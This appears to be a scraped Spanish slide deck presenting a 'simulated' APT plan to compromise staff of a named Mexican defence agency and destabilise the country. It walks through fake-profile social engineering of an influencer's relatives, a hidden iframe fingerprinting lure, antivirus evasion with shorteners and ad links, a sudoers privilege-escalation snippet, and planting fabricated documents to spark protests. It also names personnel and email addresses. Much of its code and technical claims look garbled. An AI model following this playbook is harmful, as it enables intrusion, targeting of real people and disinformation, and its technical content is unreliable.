Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
 
Iniciación al Ethical Hacking
Iniciación al Ethical HackingIniciación al Ethical Hacking
Iniciación al Ethical Hacking
 
Delincuentes informaticos (2)
Delincuentes informaticos (2)Delincuentes informaticos (2)
Delincuentes informaticos (2)
 
HoneyNet
HoneyNetHoneyNet
HoneyNet
 
Origen de los_problemas_de_seguridad_informatica_nuevo
Origen de los_problemas_de_seguridad_informatica_nuevoOrigen de los_problemas_de_seguridad_informatica_nuevo
Origen de los_problemas_de_seguridad_informatica_nuevo
 
TRABAJO EN CLASE CARLOS MONTERO
TRABAJO EN CLASE CARLOS MONTEROTRABAJO EN CLASE CARLOS MONTERO
TRABAJO EN CLASE CARLOS MONTERO
 
Los atacantes y profesionales de la ciberseguridad
Los atacantes y profesionales de la ciberseguridadLos atacantes y profesionales de la ciberseguridad
Los atacantes y profesionales de la ciberseguridad
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
 
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]Origen de los_problemas_de_seguridad_informatica_nuevo[1]
Origen de los_problemas_de_seguridad_informatica_nuevo[1]
 
Hackon URJC
Hackon URJCHackon URJC
Hackon URJC
 
Webinar Gratuito "Ingeniería Social"
Webinar Gratuito "Ingeniería Social"Webinar Gratuito "Ingeniería Social"
Webinar Gratuito "Ingeniería Social"
 
Fase6_100414_66_Colaborativo
Fase6_100414_66_ColaborativoFase6_100414_66_Colaborativo
Fase6_100414_66_Colaborativo
 
PPT_Carlos Nieto_v03_06_2021.pptx
PPT_Carlos Nieto_v03_06_2021.pptxPPT_Carlos Nieto_v03_06_2021.pptx
PPT_Carlos Nieto_v03_06_2021.pptx
 
Penetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingPenetration Testing / Ethical Hacking
Penetration Testing / Ethical Hacking
 

How to destabilize a country through cyber attacks

  • 1. ADVANCED PERSISTENT THREAT - 1 HOW TO DESTABILIZE A COUNTRY
  • 2. Presentacion Hola ! Mi nombre es jonathan inicie en la seguridad informatica a inicios del 2009 Los primeros anos me dedique a investigar malware , Durante el ano 2012 me dedique a investigar a hackers Estado Nacion , Metodologia y vulnerabilidades de dia 0 #zeroday y sus vectores de Ataque , en algunas ocasiones comparto seguridad para el kernel linux en WHONIX y temas de seguridad en Undercode . Mi principal actividad - Crear Vectores de Seguridad Linux Investigar Vulnerabilidades zeroday / Linux Crear Metodologias de Ataque Crear Modelos de Inteligencia Crear Sistemas OS Linux / Operaciones Ciberneticas Crear vulnerabilidades de dia 0 / Linux
  • 3. SPECTRE METODOLOGIA Spectre > Es una metodologia privada de Ataque el cual maneja diferentes caracteristicas de operacion avanzada y rapidez . Esta metodologia permite ser utilizada para evaluar la seguridad de un objetivo critico . Por ejemplo > Militar / Aereo – Espacial / Infraestructura Critica / Presidencia de un Pais ,,, Estructura / Spectre - Investigacion - Estrategia - Analisis - Rapidez - Sigilo - Anonimato - Camouflage - Clonacion - Explotacion * Fragmentacion - Punto de retorno - Acciones Objetivo - Limpieza
  • 4. CONTRA CIBER INTELIGENCIA CCI Permite evaluar las tecnicas utilizadas por laboratorios de seguridad a su vez permite observar y aprender de la seguridad utilizada por equipos / red team / blue team / purple team . CCI permite ver un panorama amplio y diferente , a su vez permite identificar puntos vulnerables durante el analisis e investigacion , Nunca utiliza el mismo parametro de Ciber - inteligencia CCI se divide en 2 caracteristicas principales . Contra Ciber Inteligencia / Defensa Contra Ciber Inteligencia / Ataque
  • 5. Introduccion La diapositiva tratara de explicar de manera practica un ataque dirigido a un objetivo que permita desestabilizar un pais Para este desarrollo se utilizara la metodogia spectre , de investigacion y analisis se utilizaran tecnicas de Contra Ciber Inteligencia , En mexico se muestra un panorama diferente el cual empresas nacionales O internacionales e instituciones son afectadas, o son objetivo de Unidades Cyberwarfare y Unidades APT . El Ataque del objetivo es simulado y didactico # Un atacante tiene el mismo conocimiento de los especialistas en ciberseguridad mostrando un ataque mas exacto y complejo a fin evitar todas las posibilidades de una respuesta .
  • 6. Investigacion > Este proceso es el mas importante ya que permitira recolectar toda la informacion necesaria , para evitar ser detectado nunca se utilizaran herramientas OSINT u otra , esto evitara ser identificado y detectado . Una vez identificado se evalua el objetivo y alcance que tendria al atacar el objetivo Que tan eficaz seria , que tiempo de respuesta tiene durante una emergencia , evaluar el conocimiento de su personal TIC – Ciberseguridad a fin de conocer sus estrategias Objetivo > SEDEMA / SECRETARIA DE LA DEFENZA XXX Alcanze > Nacional / Pais Completo Tiempo de Respuesta > 5 Dias Conocimiento > Tecnicas de Ciberdefensa Ciberseguridad > Centro Operaciones del Ciberespacio Estrategia > Comparte informacion con otras intituciones , su principal soporte CERT-MXO
  • 7.
  • 8. La busqueda manualmente nos permite observar su estructura interna Por ejemplo insignias , sistemas operativos y cosas importantes que nos permite evaluar
  • 9. La evaluacion nos permite observar un sistema operativo , windows 10 , y hardware inalambrico , Teclado y Mouse A su vez podemos observar que el area de Protección Civil utiliza internet – Local – Externo para recibir informacion Las insignias nos permiten identificar al personal del area de operaciones del ciber espacio y estudiar su comportamiento en linea
  • 10. La investigacion nos permite observar a diferentes personas que trabajan en la secretaria de defenza SEDEMA , instalaciones e imagenes de sus intereses , amigos , gustos , etc Las insignias nos permitio la ubicacion de una persona comunicologa e influenzer de SEDEMA el cual le permiten grabar e informar sobre las actividades de la institucion # Identificando al Objetivo Entre sus contactos podemos observar personal militar de diferentes rangos Llamandose Antiguedad #
  • 11. Estrategia Infectar el dispositivo de la chica influenzer el cual podremos llegar a objetivos de mayor Grado / Estado Mayor Militar La influenzer tiene una hermana con mucha actividad en redes sociales A su vez ella tiene un novio con actividad en redes sociales y muchas amigas que no estan en comun . Paso 1 Crear Un perfil falso de una chica atractiva , con gustos similares a los del chico , Paso 2 Ubicacion cdmx , Estudiante de universidad uvm subir fotos normal No provocativas ni nada Paso 3 Una vez teniendo 10,000 seguridores o un poco mas se enviara Solicitud de amistad al chico > El chico aceptara la solicitud . Paso 4 Conversacion , El chico mostrara interes de la chica el cual en algun momento mencionara si pueden ser amigos y conocerse, ella se negara pero utilizara la estrategia del huracan Conversacion > EL > hola como estas Ella > hola bien , pero preocupada por los perritos de cancun , quisiera ayudarlos El > Si , yo te podria ayudar pero que podemos hacer Ella > si compramos alimento y lo enviamos , mira no tienen nada que comer LINK > Imagen > Recolector
  • 12. El chico al dar click seran capturados sus datos Por recolector . Sistema operativo Version Arquitectura IP Address JavaScript WebRTC Leak Test Canvas Fingerprint WebGL Report Font Fingerprinting Geolocation API Features Detection SSL/TLS Client Test Content Filters Esta herramienta Puede ser modificada como un Exploit Pack evitando la carga de CVE unicamente utilizado para recolectar informacion
  • 13. Encode html : &lt;iframe src=&quot;hola.html&quot; style=&quot;width: 0%; height: 0px; border: 0&quot;&gt;&lt;/iframe&gt;
  • 14. Ejemplo Panel Recolector Panel recolector guardara toda la informacion del objetivo , a travez de iframes no sera detectada por ningun AV o identificador de malware , Abuse-ch , virustotal , Anubis etc ..
  • 15. Las unidades APT siempre utilizan en sus tecnicas 0 / 45 detencion / Ejemplo de Pagina no encontrada de recolector ,
  • 16. Analisis Analisis permite revisar la informacion exacta del objetivo , una vez obtenido se identifica que vulnerabilidad se utilizara , 07-13 21:50:59.000 3351 3351 I /system/bin/tombstoned: received crash request for pid 24089 07-13 21:50:59.006 24089 24089 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** 07-13 21:50:59.006 24089 24089 F DEBUG : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:us er/release-keys' 07-13 21:50:59.006 24089 24089 F DEBUG : Revision: '9' 07-13 21:50:59.006 24089 24089 F DEBUG : ABI: 'arm64' 07-13 21:50:59.006 24089 24089 F DEBUG : pid: 24089, tid: 24089, name: media.extractor >>> mediaextractor <<< 07-13 21:50:59.006 24089 24089 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050 07-13 21:50:59.009 24089 24089 F DEBUG : x0 00000000ffffff36 x1 0000000000000000 x2 00000000000000f0 x3 0000000000000001 07-13 21:50:59.009 24089 24089 F DEBUG : x4 0000000000000001 x5 0000007ccb5df1b8 x6 0000007cc927363e x7 0000007cc8e7bd04 07-13 21:50:59.009 24089 24089 F DEBUG : x8 0000000000004170 x9 0000000000004160 x10 00000000ffffffff x11 0000007ccb7fbef0 07-13 21:50:59.010 24089 24089 F DEBUG : x12 0000007ccb5d3ce0 x13 000000000000001e x14 0000000000000003 x15 0000000000000001 07-13 21:50:59.010 24089 24089 F DEBUG : x16 0000007cc99f5f50 x17 0000007ccb88885c x18 0000007ccb566225 x19 0000007ccb562020 07-13 21:50:59.010 24089 CVE – RCE Android
  • 17. Download se activara cuando identifique parametros especificos del objetivo La chica mencionara a mi si me carga la imagen de los perritos , El objetivo nuevamente ingresara y la imagen podra ser observada y sera descargada Sin error no encontrado.
  • 18. Download e iframe detectara parametros exactos del objetivo IP : 170.244.77.221 Country: Mexico State: Ciudad de Mexico City: Azcapotzalco Latitude: 19.4888 Longitude: -99.1836 ISP: IZZI Cable S.A. de C.V. Browser Name: Firefox Browser Type: Browser Browser Version: 102 Browser Engine: Gecko 102 JavaScript: Enabled Cookies: Enabled Screen Resolution: 1600x900 Browser Window Size: 1600x735 Name: Android Version: 9.1 series xx Platform: xxx var e=this||self; var f={};function w(a,c){if(null===c)return!1;if("contains"in a&&1==c.nodeType)return a.contains(c);if("compareDocumentPosition"in a)return a==c||!! (a.compareDocumentPosition(c)&16);for(;c&&a! =c;)c=c.parentNode;return c==a}; var y=function(a,c){return function(d){d||(d=window.event);return c.call(a,d)}},z="undefined"!=typeof navigator&&/Macintosh/.test(navigator.userAgent),E=function() {this._mouseEventsPrevented=!0};var F=function(a) {this.g=a;this.h=[]},G=function(a){for(var c=0;c<a.h.length;++c){var d=a.g,b=a.h[c];d.removeEventListener? d.removeEventListener(b.eventType,b.s,b.capture):d.detachEvent&&d .detachEvent("on"+b.eventType,b.s)}a.h=[]};var H=e._jsa|| {};H._cfc=void 0;H._aeh=void 0; var I=function(){this.h=this.g=null},K=function(a,c){var d=J;d.g=a;d.h=c;return d};I.prototype.i=function(){var a=this.g;this.g&&this.g!=this.h?this.g=this.g.__owner|| this.g.parentNode:this.g=null;return a};var L=function(){var a;this.j=a=void 0===a?[]:a;this.g=0;this.h=null;this.l=! 1},N=function(a,c){var d=M;d.j=a;d.g=0;d.h=c;d.l=!1;return d};L.prototype.i=function(){if(this.l)return J.i();if(this.g!=this.j.length){var a=this.j[this.g];this.g++;a!=this.h&&a&&a.__owner&&(this.l=! 0,K(a.__owner,this.h));return a}return null};var J=new I,M=new L; var Q=function() {this.v=[];this.g=[];this.h=[];this.l={};this.i=null;this.j=[];P(this,"_custom") },R=function(a){return String.prototype.trim?a.trim():a.replace(/^ s+/,"").replace( Parametros objetivo
  • 19. El objetivo no se percatara de links o coversaciones enviadas . La persona infectada al tratar de utilizar instagram tendra un error , en segundos todo estara normalmente
  • 20. Camouflage Esta caracteristica permite pasar desapercibido a su vez permite observar y aprender caracteristicas , motivaciones e informacion importante El atacante tiene como finalidad aprender y socialiazar como un militar ya que se necesitara informacion u compartamiento militar para llegar al objetivo principal .
  • 21. SIGILO Sigilo es un mecanismo de defensa el cual pasara inadvertido por los laboratorios de seguridad ya que se ocultara utilizando codigo de Google Se utilizaran los parametros que mencionan las compañias AV para evadir su proteccion No Descargar Archivos Ejecutables No Ingresar en paginas sin certificado SSL No Compartas informacion No Abrir correos Electronicos ... Esta caracteristica permite que el objetivo venga al atacante y no biceversa , ya que en ningun momento pedira informacion o actuara mal intensionado
  • 22. Pagina comprometida con iframe el cual sera visitada por el objetivo / Miltar de Proteccion Civil https://googleads.g.doubleclick.net/aclk?sa=l&ai=C6c1ZFq9XZbHBE- SW_tMPq4Oy2AL0gsyYdJagiufqEdnbjuOSDhABIOr60Uxg5eP2hJgWoAHy4siIA8gBAqgDAcgDyQSqBP4BT9A5t6PaDXJyiLbajvOasnXm4q9qcyPlbs2JhGe00w1mrJD4xcPeLTylua1capb 3rM0kyvf7iT7H6oBvz9A3R5xfa_JjyXvwU4VIq0T1xIhyMCZG-oFG6yqEk2rA62W3bwx0owrcL28Racd0xoux8tWk-Ap-XzbNOBPQKJs8jSTTy6Znu0YSx6Ba- pdJw2CoBqBrHoNhcFqK35lqJjCyBMWh-uJn32SA5G9OOKVsCo-H6DZYfhDc7SlKsFuZwP1Rc0ztLZiHdKKRHWu7zVx7YJOYnMfUbqbObJfNfalZ- Zkghf5R4fs_IdehcS92FwtgX0Yuf2bTqOVboF1uXDDABIChzN7QBIgF7IKWx0ygBgKAB5fEmvIEqAfZtrECqAeOzhuoB5PYG6gH7paxAqgH_p6xAqgH1ckbqAemvhuoB5oGqAfz0RuoB5b YG6gHqpuxAqgHg62xAqgH_56xAqgH35- xAtgHAdIIFAiAYRABGB8yAooCOgKAQEi9_cE6sQlg7LvHOMklVoAKAYoK7wFodHRwczovL3BpeGVsLmV2ZXJlc3R0ZWNoLm5ldC83OTAvY3E_ZXZfc2lkPTMmZXZfbG49JmV2X2x4PS Zldl9jcng9NjczNzIwNzk4OTY4JmV2X210PSZldl9uPWQmZXZfbHR4PSZldl9wbD1zdXJhY2FwdWxjby5teCZldl9wb3M9JmV2X2R2Yz1jJmV2X2R2bT0mZXZfcGh5PTEwMTAwOTEmZXZ fbG9jPSZldl9jeD0yMDU1MDM1MzI2MCZldl9heD0xNTkxMTIxNzE2NDgmZXZfZWZpZD17Z2NsaWR9Okc6cyZ1cmw9e2xwdXJsfZgLAcgLAeALAaIMFCoSChDktLEC7rWxArW4sQK7u7 ECqg0CTVjIDQHYEw3QFQH4FgGAFwE&ae=1&gclid=EAIaIQobChMIsaT5mtPLggMVZIt_BB2rgQwrEAEYASAAEgLcKfD_BwE&num=1&cid=CAQSTwDICaaNr0-80mYhy3_k- K3X0YajdQrWmBw9Uk73FAfPL5FK7Pu5rjN609rgMpKFJm_PQLOFfYs87VlF2p-cD6B8nFnXjbi5yjvrQ7gILosYAQ&sig=AOD64_3zU9kKPPqAc_txFm8fbDlpoYxjfQ&client=ca-pub- 5434027793127906&rf=2&nb=17&adurl=https://IFRAME.HTML_id%3DEAIaIQobChMIsaT5mtPLggMVZIt_BB2rgQwrEAEYASAAEgLcKfD_BwE:G:s%26s_kwcid%3DAL!790!3! 673720798968!!suracapulco.mx!d!!!20550353260!159112171648%26cmp%3DKAC-INI-GOOGUS-GO-MX_GL-EN-RE-DS-REBUY-CREATE-MB_ALWAYS_ON-SHOP-XX-BN-WV- CIDNA00000-MB_INSIDERS%26gclid%3DEAIaIQobChMIsaT5mtPLggMVZIt_BB2rgQwrEAEYASAAEgLcKfD_BwE
  • 23. Una vez el militar de click sera comprometido su dispositivo , en Esta segunda Fase nos ubicamos dentro de personal que trabaja dentro del campo militar XX El atacante eliminara procesos anteriores a fin de utlizar el anonimato para no ser identificado
  • 24. Objetivo SargentoMuyBravo Conoce las actividades que realiza el Ejército y Fuerza Aérea Mexicanos en beneficio del pueblo Página · Medio de comunicación/noticias Av. Industria Militar S/N, Esq. Blvd. Manuel Ávila Camacho, Mexico City, 55 2132 9900 sargentomuybravo.dn29@sedema.gob.mx gob.mx/sedema Siempre abierto Calificación · 5,0 (5 opiniones)
  • 25. Los Acortadores se utilizaran para insertar el iframe no siendo detectado por ningun AV https://bit.ly/23144xxxxx al igual que el objetivo anterior primero se identificara informacion del dispositivo Una vez identificado los parametros exactos el objetivo podra visualizar correctamente la pagina . Notando su COMIC # SEDEMA COMIC 6 / <script type="50dd510e60eab9be36cad392- text/javascript"> !function(t,n,i,s){var e=function(s,e) {this.elem=s,this. $elem=t(s),this.options=e,this.metada ta=this.$elem.data("plugin- options"),this. $win=t(n),this.sections={},unction iPadLogic(){!0===(/iPad|iPhone| iPod/.test(navigator.platform)||"MacInt el"===navigator.platform&&1<navigat or.maxTouchPoints)&&(window.regSe ttings.steps=2,window
  • 26. El atacante utilizara el anonimato para evitar la identificacion de sus herramientas u operaciones ciberneticas , Utilizando recursos disponibles de internet de esta manera evita la identificacion de google , dorks , trace u otro compartamiento que necesite ser revisado Como funciona ! Cuando un atacante crea un panel de administracion nuevo , para los motores de busqueda o IA es mas sencillo identificar ya que no existe otro igual , codigo , head , meta , estructura , comportamiento etc La utilizacion de paneles de administracion evade la inteligencia de Google e IA y que es similar a millones de administradores que se encuentran en linea ..
  • 27. Ejemplo Panel de Administracion , El panel unicamente recolectara informacion especifica del hardware , software , del objetivo al igual que informacion importante como , Emails , doc, xls , etc Informacion Especifica Del objetivo Hardware ID CPU Informacion GPU Informacion Hardware , Teclado , Mouse , Dispositivos Externos Software > Programas Instalados , Programas de seguridad etc ..
  • 28. Informacion Sargento muyBravo Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.2151.72 Hardware ID > DHAJDHUI88932487GHJKSDJI74794808 Antivirus > Avest Free Sandbox > No found Maquina Virtual > No found IDS / IPS > No found Firewall > No found EDR / XDR > No found Memory Protection > No found CPU Protection > No found I/O Protection > No found Software Windows Office V . 2019 xx xx Licence x Winrar / ccleaner / Vlc / etc ..
  • 29. Identificacion del Estado Mayor Correos Electronicos extraidos Del correo electronico comprometido identificando a generales del Estado Mayor El cual conducira al Objetivo Principal Gral Brig D.E.M Pedro Pablo Sanchez / Telefono xxx /Extension 85xxx / Correo ss.xxxxx.xxsx@sedema.gob.mx Jefe de la xx / E.M.D.N revista.dn29@sedema.gob.mx Xxxxx@sedema.gob.mx Panel de administraccion Email , permitiendo el abceso sin restriciones de Sedema
  • 30. El atacante utilizara documentos originales el cual no podran distinguirse utilizando la seguridad exactamente igual - Correo Cetificado - Correo Verificado Esto le permite al atacante pasar desapercibido de esta manera el atacante utiliza camouflage utilizando su misma estructura Ejemplo Email original / Infectado
  • 31. Clonacion Este parametro permite al atacante clonar toda la estructura a la cual sera insertada la vulnerabilidad o vector zeroday o exploit 0day . Esto le permite saber con exactitud donde hay un error o hasta que punto la seguridad es eficaz En este punto el atacante se encuentra dentro de las computadoras del Estado Mayor El atacante identifico vulnerabilidades en Antivirus ESIT nod42 y Suricata IDS / Permitiendo envio de informacion maximo 1.MB , puerto 443 UDP / Puerto 80 TCP / .html .ico . css El atacante unicamente afectara dispositivos atravez de Hardware ID tcp 0 0 192.168.1.8:80 192.178.52.234:443 TIME_WAIT - tcp 0 0 192.168.1.8:80 173.194.143.6:443 ESTABLISHED tcp 0 0 192.168.1.8:80 173.194.143.6:443 ESTABLISHED tcp 0 0 192.168.1.8:80 189.195.42.140:443 ESTABLISHED
  • 32. Fragmentacion Este parametro permite evaluar , identificar y detectar posible evasion , perimetro o anticipacion a su vez permite observar el vector exacto para infectar al objetivo
  • 33. Vector zeroday Esta caracteristica analiza la ejecucion y proceso que tendra la vulnerabilidad – exploit zeroday , a su vez tiene auto eliminacion y proteccion Analizador Identificador ID Carga útil . Escaner de estructura interna Auto-eliminación Exploit 0 day
  • 34. wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.2 netmask 255.255.255.0 broadcast 192.168.1.255 ether c6:ce:13:92:02:2c txqueuelen 1000 (Ethernet) @461890585618002:~$ swapon -s Filename Type Size Used Priority /dev/sda5 partition 998396 0 -2 # Certificates for signature checking CONFIG_MODULE_SIG_KEY is not set # CONFIG_MODULE_SIG_KEY_TYPE_RSA is not set CONFIG_MODULE_SIG_KEY_TYPE_ECDSA is not set CONFIG_SYSTEM_TRUSTED_KEYRING is not set CONFIG_SYSTEM_TRUSTED_KEYS is not set CONFIG_SYSTEM_EXTRA_CERTIFICATE is not set CONFIG_SYSTEM_EXTRA_CERTIFICATE_SIZE is not set CONFIG_SECONDARY_TRUSTED_KEYRING is not set CONFIG_SYSTEM_BLACKLIST_KEYRING is not set CONFIG_SYSTEM_BLACKLIST_HASH_LIST is not set CONFIG_SYSTEM_REVOCATION_LIST is not set CONFIG_SYSTEM_REVOCATION_KEYS is not set # end of Certificates for signature Exploit echo "> Opening sudoers file," echo "$( whoami ) ALL=(ALL:ALL) ALL" read -n 1 -s -p -a" EDITOR="soffice -- /etc/sudoers" $exploit 00x/00x/00x/ sudo su root Exit 0 mv /sys/firmware/i915/* ………..xx Hardware ID / etc/machine-id : 10447166441267740514483863 0014 /proc/cpuinfo - processor : xxxxx vendor_id : xxxxx cpu family : xxxxx model : xxxxx model name : xxxxx stepping : xxxxx microcode : xxxxx
  • 35. Centro del Ciberespacio Punto de retorno Este parametro permite atacar diferentes objetivos al mismo tiempo Durante el analisis el intercambio de informacion entre instituciones nos permite saber de forma especifica sus herramientas
  • 36. Acciones Objetivo En Este punto el secretario de SEDEMA fue comprometido su dispositivo , En este punto el atacante puede filtrar informacion , U otro pero APT – 1 Tiene una funcion especifica Desestabilizar un Pais completo , El atacante creara documentos con informacion que no existe el cual seran compartidos desde sus dispositivos .. - Iniciaran Manifestaciones en la ciudad - Se perjudicara la economia en los estados - Colectivos sociales , etc iniciaran manifestaciones en los estados - La democracia se vera afectada - etc ...
  • 37. Limpieza Este parametro permite evadir cualquier tipo de recoleccion de evidencia o intento de identificar su operacion cibernetica . Las unidades APT o APT -1 Utilizan a hackers o grupos de hackers el cual limpiaran su actividad Acciones - Delete / Wipe / Eliminar Persistencia de ubicaciones / audio / Grafica / Teclado inalambrico etc Wipe Memori Kernel Abrir Puertos / Permitir Conexiones Inlimitadas 20/tcp open unknown 21/tcp open ftp 22/tcp open ssht 80/tcp open unknown 112/tcp open unknown 32659/tcp open unknown Insertar vulnerabilidades en aplicaciones Estos parametros evitan la identificacion del Atacante , una vez identificado los puertos abiertos , hackers con diferentes propositos podran explotar la vulnerabilidad eliminando por completo el rastro de la unidad APT Ejemplo . Aplicacion vulnerable modificada a una version actual
  • 38. Como Puedo Protegerme ! Como se puede observar las Unidades APT o Unidades Cyberwarfare tienen capacidades diferentes el cual una seguridad estandar puede ser evadida La randomizacion completa permite evadir el reconocimiento Usuario , gpu, cpu informacion , hardware , Teclado inalambrico / Mouse , red entre otros Ejemplo al iniciar la seguridad Nucleo 1 tiempo uname -a 11111111111111111111111111111 461890585618002 1111.1111.1111 x86_64 GNU/Linux Nucleo tiempo 2 uname -a 2222222222222222222222222 647909467589290 1111.1111.1111 x86_64 GNU/Linux Nucleo Tiempo 3 3333333333333333333333333 346578294759602 1111.1111.1111 x86_64 GNU/Linux
  • 39.